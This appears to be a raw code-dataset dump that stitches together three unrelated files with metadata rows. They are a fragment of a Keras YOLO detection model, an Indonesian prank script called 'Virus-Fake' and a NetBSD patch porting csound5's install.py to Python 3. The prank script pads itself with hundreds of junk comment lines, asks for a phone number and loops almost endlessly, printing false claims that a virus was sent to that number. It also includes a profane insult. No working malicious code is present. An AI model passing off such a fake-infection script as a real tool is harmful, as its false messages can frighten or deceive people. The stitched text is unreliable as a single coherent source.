# feat2的shape为13,13,512
#---------------------------------------------------#
feat1, feat2 = darknet_body(inputs)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(feat2)
P5 = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
# 使用了SPP结构,即不同尺度的最大池化后堆叠。
maxpool1 = MaxPooling2D(pool_size=(13,13), strides=(1,1), padding='same')(P5)
maxpool2 = MaxPooling2D(pool_size=(9,9), strides=(1,1), padding='same')(P5)
maxpool3 = MaxPooling2D(pool_size=(5,5), strides=(1,1), padding='same')(P5)
P5 = Concatenate()([maxpool1, maxpool2, P5])
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
P5 = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
P5 = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5 = DarknetConv2D_BN_Leaky(256, (1,1))(P5)
# 13,13,512 -> 13,13,256 -> 26,26,256
P5_upsample = compose(DarknetConv2D_BN_Leaky(256, (1,1)), UpSampling2D(2))(P5)
# 26,26,512 -> 26,26,256
P4 = DarknetConv2D_BN_Leaky(256, (1,1))(feat1)
P4 = DarknetConv2D_BN_Leaky(512, (3,3))(P4)
P4 = DarknetConv2D_BN_Leaky(256, (1,1))(P4)
maxpool1 = MaxPooling2D(pool_size=(13,13), strides=(1,1), padding='same')(P4)
maxpool2 = MaxPooling2D(pool_size=(9,9), strides=(1,1), padding='same')(P4)
P4 = Concatenate()([maxpool1, maxpool2, P4])
P4 = DarknetConv2D_BN_Leaky(256, (1,1))(P4)
P4 = DarknetConv2D_BN_Leaky(512, (3,3))(P4)
# 26,26,256 + 26,26,256 -> 26,26,512
P4 = Concatenate()([P4, P5_upsample])
#---------------------------------------------------#
# 第二个特征层
# y2=(batch_size,26,26,3,85)
#---------------------------------------------------#
P4_output = DarknetConv2D_BN_Leaky(512, (3,3))(P4)
P4_output = DarknetConv2D(num_anchors*(num_classes+5), (1,1))(P4_output)
#---------------------------------------------------#
# 第一个特征层
# y1=(batch_size,13,13,3,85)
#---------------------------------------------------#
P5_output = DarknetConv2D_BN_Leaky(512, (3,3))(P5)
P5_output = DarknetConv2D(num_anchors*(num_classes+5), (1,1))(P5_output)
return Model(inputs, [P5_output, P4_output])
#---------------------------------------------------#
# 将预测值的每个特征层调成真实值
#---------------------------------------------------#
def yolo_head(feats, anchors, num_classes, input_shape, calc_loss=False):
num_anchors = len(anchors)
#---------------------------------------------------#
# [1, 1, 1, num_anchors, 2]
#---------------------------------------------------#
anchors_tensor = K.reshape(K.constant(anchors), [1, 1, 1, num_anchors, 2])
#---------------------------------------------------#
# 获得x,y的网格
# (13, 13, 1, 2)
#---------------------------------------------------#
grid_shape = K.shape(feats)[1:3]
grid_y = K.tile(K.reshape(K.arange(0, stop=grid_shape[0]), [-1, 1, 1, 1]),
[1, grid_shape[1], 1, 1])
grid_x = K.tile(K.reshape(K.arange(0, stop=grid_shape[1]), [1, -1, 1, 1]),
[grid_shape[0], 1, 1, 1])
grid = K.concatenate([grid_x, grid_y])
grid = K.cast(grid, K.dtype(feats))
#---------------------------------------------------#
# 将预测结果调整成(batch_size,13,13,3,85)
# 85可拆分成4 + 1 + 80
# 4代表的是中心宽高的调整参数
# 1代表的是框的置信度
# 80代表的是种类的置信度
#---------------------------------------------------#
feats = K.reshape(feats, [-1, grid_shape[0], grid_shape[1], num_anchors, num_classes + 5])
#---------------------------------------------------#
# 将预测值调成真实值
# box_xy对应框的中心点
# box_wh对应框的宽和高
#---------------------------------------------------#
box_xy = (K.sigmoid(feats[..., :2]) + grid) / K.cast(grid_shape[::-1], K.dtype(feats))
box_wh = K.exp(feats[..., 2:4]) * anchors_tensor / K.cast(input_shape[::-1], K.dtype(feats))
box_confidence = K.sigmoid(feats[..., 4:5])
box_class_probs = K.sigmoid(feats[..., 5:])
#---------------------------------------------------------------------#
# 在计算loss的时候返回grid, feats, box_xy, box_wh
# 在预测的时候返回box_xy, box_wh, box_confidence, box_class_probs
#---------------------------------------------------------------------#
if calc_loss == True:
return grid, feats, box_xy, box_wh
return box_xy, box_wh, box_confidence, box_class_probs
#---------------------------------------------------#
# 对box进行调整,使其符合真实图片的样子
#---------------------------------------------------#
def yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape):
#-----------------------------------------------------------------#
# 把y轴放前面是因为方便预测框和图像的宽高进行相乘
#-----------------------------------------------------------------#
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
new_shape = K.round(image_shape * K.min(input_shape/image_shape))
#-----------------------------------------------------------------#
# 这里求出来的offset是图像有效区域相对于图像左上角的偏移情况
# new_shape指的是宽高缩放情况
#-----------------------------------------------------------------#
offset = (input_shape-new_shape)/2./input_shape
scale = input_shape/new_shape
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = K.concatenate([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
])
boxes *= K.concatenate([image_shape, image_shape])
return boxes
#---------------------------------------------------#
# 获取每个box和它的得分
#---------------------------------------------------#
def yolo_boxes_and_scores(feats, anchors, num_classes, input_shape, image_shape, letterbox_image):
#-----------------------------------------------------------------#
# 将预测值调成真实值
# box_xy : -1,13,13,3,2;
# box_wh : -1,13,13,3,2;
# box_confidence : -1,13,13,3,1;
# box_class_probs : -1,13,13,3,80;
#-----------------------------------------------------------------#
box_xy, box_wh, box_confidence, box_class_probs = yolo_head(feats, anchors, num_classes, input_shape)
#-----------------------------------------------------------------#
# 在图像传入网络预测前会进行letterbox_image给图像周围添加灰条
# 因此生成的box_xy, box_wh是相对于有灰条的图像的
# 我们需要对齐进行修改,去除灰条的部分。
# 将box_xy、和box_wh调节成y_min,y_max,xmin,xmax
#-----------------------------------------------------------------#
if letterbox_image:
boxes = yolo_correct_boxes(box_xy, box_wh, input_shape, image_shape)
else:
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
boxes = K.concatenate([
box_mins[..., 0:1] * image_shape[0], # y_min
box_mins[..., 1:2] * image_shape[1], # x_min
box_maxes[..., 0:1] * image_shape[0], # y_max
box_maxes[..., 1:2] * image_shape[1] # x_max
])
#-----------------------------------------------------------------#
# 获得最终得分和框的位置
#-----------------------------------------------------------------#
boxes = K.reshape(boxes, [-1, 4])
box_scores = box_confidence * box_class_probs
box_scores = K.reshape(box_scores, [-1, num_classes])
return boxes, box_scores
#---------------------------------------------------#
# 图片预测
#---------------------------------------------------#
def yolo_eval(yolo_outputs,
anchors,
num_classes,
image_shape,
max_boxes=20,
score_threshold=.6,
iou_threshold=.5,
letterbox_image=True):
#---------------------------------------------------#
# 获得特征层的数量,有效特征层的数量为3
#---------------------------------------------------#
num_layers = len(yolo_outputs)
#-----------------------------------------------------------#
# 13x13的特征层对应的anchor是[81,82], [135,169], [344,319]
# 26x26的特征层对应的anchor是[23,27], [37,58], [81,82]
#-----------------------------------------------------------#
anchor_mask = [[6,7,8], [3,4,5], [0,1,2]] if num_layers==3 else [[3,4,5], [1,2,3]]
#-----------------------------------------------------------#
# 这里获得的是输入图片的大小,一般是416x416
#-----------------------------------------------------------#
input_shape = K.shape(yolo_outputs[0])[1:3] * 32
boxes = []
box_scores = []
#-----------------------------------------------------------#
# 对每个特征层进行处理
#-----------------------------------------------------------#
for l in range(num_layers):
_boxes, _box_scores = yolo_boxes_and_scores(yolo_outputs[l], anchors[anchor_mask[l]], num_classes, input_shape, image_shape, letterbox_image)
boxes.append(_boxes)
box_scores.append(_box_scores)
#-----------------------------------------------------------#
# 将每个特征层的结果进行堆叠
#-----------------------------------------------------------#
boxes = K.concatenate(boxes, axis=0)
box_scores = K.concatenate(box_scores, axis=0)
#-----------------------------------------------------------#
# 判断得分是否大于score_threshold
#-----------------------------------------------------------#
mask = box_scores >= score_threshold
max_boxes_tensor = K.constant(max_boxes, dtype='int32')
boxes_ = []
scores_ = []
classes_ = []
for c in range(num_classes):
#-----------------------------------------------------------#
# 取出所有box_scores >= score_threshold的框,和成绩
#-----------------------------------------------------------#
class_boxes = tf.boolean_mask(boxes, mask[:, c])
class_box_scores = tf.boolean_mask(box_scores[:, c], mask[:, c])
#-----------------------------------------------------------#
# 非极大抑制
# 保留一定区域内得分最大的框
#-----------------------------------------------------------#
nms_index = tf.image.non_max_suppression(
class_boxes, class_box_scores, max_boxes_tensor, iou_threshold=iou_threshold)
#-----------------------------------------------------------#
# 获取非极大抑制后的结果
# 下列三个分别是
# 框的位置,得分与种类
#-----------------------------------------------------------#
class_boxes = K.gather(class_boxes, nms_index)
class_box_scores = K.gather(class_box_scores, nms_index)
classes = K.ones_like(class_box_scores, 'int32') * c
boxes_.append(class_boxes)
scores_.append(class_box_scores)
classes_.append(classes)
boxes_ = K.concatenate(boxes_, axis=0)
scores_ = K.concatenate(scores_, axis=0)
classes_ = K.concatenate(classes_, axis=0)
return boxes_, scores_, classes_
| 42.848387 | 149 | 0.443424 |
865dc4ddf79c635bc688a33bc3eb6b1fd49bd885
| 17,227 |
py
|
Python
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import os,time,sys
from datetime import datetime
def ketik(teks):
for i in teks + "\n":
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(0.01)
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
saat_ini = datetime.now()
tgl = saat_ini.strftime('%d')
bln = saat_ini.strftime('%m')
thn = saat_ini.strftime('%Y')
waktu_new = (tgl+"-"+bln+"-"+thn)
xnxx="\033[85m"
q="\033[00m"
h2="\033[40m"
b2="\033[44m"
c2="\033[46m"
i2="\033[42m"
u2="\033[45m"
m2="\033[41m"
p2="\033[47m"
k2="\033[43m"
b='\033[1;34m'
i='\033[1;32m'
c='\033[1;36m'
m='\033[1;31m'
u='\033[1;35m'
k='\033[1;33m'
p='\033[1;37m'
h='\033[1;90m'
k3="\033[43m\033[1;37m"
b3="\033[44m\033[1;37m"
m3="\033[41m\033[1;37m"
os.system("clear")
ketik(m +" .---. .----------- ")
ketik(m +" / \ __ / ------ "+ k +" ["+ m +" VIRUS ANDROID"+ k +" ]")
ketik(m +" / / \( )/ ----- ")
ketik(m +" ////// ' \/ ` --- "+ p +" ➣"+ k +" Creator"+ m +" :"+ h +" ALDI BACHTIAR RIFAI")
ketik(m +" //// / // : : --- "+ p +" ➣"+ k +" Youtube"+ m +" :"+ h +" MR.1557 / B0C4H")
ketik(p +" // / / /` '-- "+ p +" ➣"+ k +" Github"+ m +" :"+ h +" https://github.com/Aldi098")
ketik(p +" // //..\\ ")
ketik(p +" ====UU====UU==== "+ k +" ["+ m +" VERSI 0.2"+ k +" ]")
ketik(p +" '//||\\` ")
ketik(p +" ''`` ")
ketik("")
try:
isi = input(p +" ➣"+ k +" Masukan Nomer "+ m +": "+ i)
mulai = input(p +" ➣"+ k +" Lanjut?"+ i +" y"+ k +"/"+ m +"t "+ m +": "+ i)
print("")
print("")
except (KeyboardInterrupt,EOFError):
ketik (m +' !'+ p +' BAY KONTOL!!')
sys.exit()
if mulai == "y":
print(m +" !"+ k +" Virus"+ p +" Sedang Di Siapkan")
time.sleep(2)
print("")
ulang = 1000000000000000000000000000000000000000000000000
for i in range(ulang):
time.sleep(0.01)
print ("\033[1;32m ✓{} Berhasil Mengirim{} Virus{} Ke Nomor >{} {}".format(p, m, p, k, isi))
elif mulai == "t":
print (m +" !"+ p +" program berhenti")
else:
print (m +" !"+ p +" tidak tersedia")
| 2.936254 | 111 | 0.500203 |
865ff16740b4c73a1f376881389830505589cda0
| 12,056 |
py
|
Python
|
source/pkgsrc/audio/csound5/patches/patch-install.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/audio/csound5/patches/patch-install.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/audio/csound5/patches/patch-install.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-install.py,v 1.4 2019/11/06 11:56:56 mrg Exp $
python 3.x support
don't fake-conflict with csound6.
--- install.py.orig 2013-01-07 04:49:35.000000000 -0800
+++ install.py 2019-11-06 03:43:25.554498784 -0800
@@ -3,7 +3,6 @@
import sys
import os
import re
-import md5
import time
# get Python version
@@ -28,13 +27,14 @@
'scsort', 'extract', 'cs', 'csb64enc', 'makecsd', 'scot']
exeFiles2 = ['brkpt', 'linseg', 'tabdes']
+exeFiles2 = []
docFiles = ['COPYING', 'ChangeLog', 'INSTALL', 'readme-csound5.txt']
# -----------------------------------------------------------------------------
-print 'Csound5 Linux installer by Istvan Varga'
-print ''
+print('Csound5 Linux installer by Istvan Varga')
+print('')
prefix = '/usr/local'
instDir = '/'
@@ -47,14 +47,14 @@
word64Suffix = ''
def printUsage():
- print "Usage: ./install.py [options...]"
- print "Allowed options are:"
- print " --prefix=DIR base directory (default: /usr/local)"
- print " --instdir=DIR installation root directory (default: /)"
- print " --vimdir=DIR VIM runtime directory (default: none)"
- print " --word64 install libraries to 'lib64' instead of 'lib'"
- print " --help print this message"
- print ""
+ print("Usage: ./install.py [options...]")
+ print("Allowed options are:")
+ print(" --prefix=DIR base directory (default: /usr/local)")
+ print(" --instdir=DIR installation root directory (default: /)")
+ print(" --vimdir=DIR VIM runtime directory (default: none)")
+ print(" --word64 install libraries to 'lib64' instead of 'lib'")
+ print(" --help print this message")
+ print("")
# parse command line options
@@ -73,10 +73,10 @@
word64Suffix = '64'
else:
printUsage()
- print 'Error: unknown option: %s' % sys.argv[i]
+ print('Error: unknown option: %s' % sys.argv[i])
raise SystemExit(1)
-print prefix
+print(prefix)
# concatenates a list of directory names,
# and returns full path without a trailing '/'
@@ -96,15 +96,15 @@
return s
# frontends
-binDir = concatPath([prefix, '/bin'])
+binDir = concatPath([prefix, '/lib/csound5'])
# Csound API header files
-includeDir = concatPath([prefix, '/include/csound'])
+includeDir = concatPath([prefix, '/include/csound5'])
# Csound API libraries
-libDir = concatPath([prefix, '/lib' + word64Suffix])
+libDir = concatPath([prefix, '/lib/csound5' + word64Suffix])
# single precision plugin libraries
-pluginDir32 = concatPath([libDir, '/csound/plugins'])
+pluginDir32 = concatPath([libDir, '/plugins'])
# double precision plugin libraries
-pluginDir64 = concatPath([libDir, '/csound/plugins64'])
+pluginDir64 = concatPath([libDir, '/plugins64'])
# XMG files
xmgDir = concatPath([prefix, '/share/locale'])
# documentation
@@ -128,7 +128,7 @@
def makeDir(dirName):
try:
- os.makedirs(concatPath([instDir, dirName]), 0755)
+ os.makedirs(concatPath([instDir, dirName]), 0o755)
except:
pass
@@ -158,9 +158,9 @@
err = runCmd(['strip', stripMode, fullName])
if err == 0:
addMD5(fullName, fileName)
- print ' %s' % fileName
+ print(' %s' % fileName)
else:
- print ' *** error copying %s' % fileName
+ print(' *** error copying %s' % fileName)
return err
def installFile(src, dst):
@@ -195,9 +195,9 @@
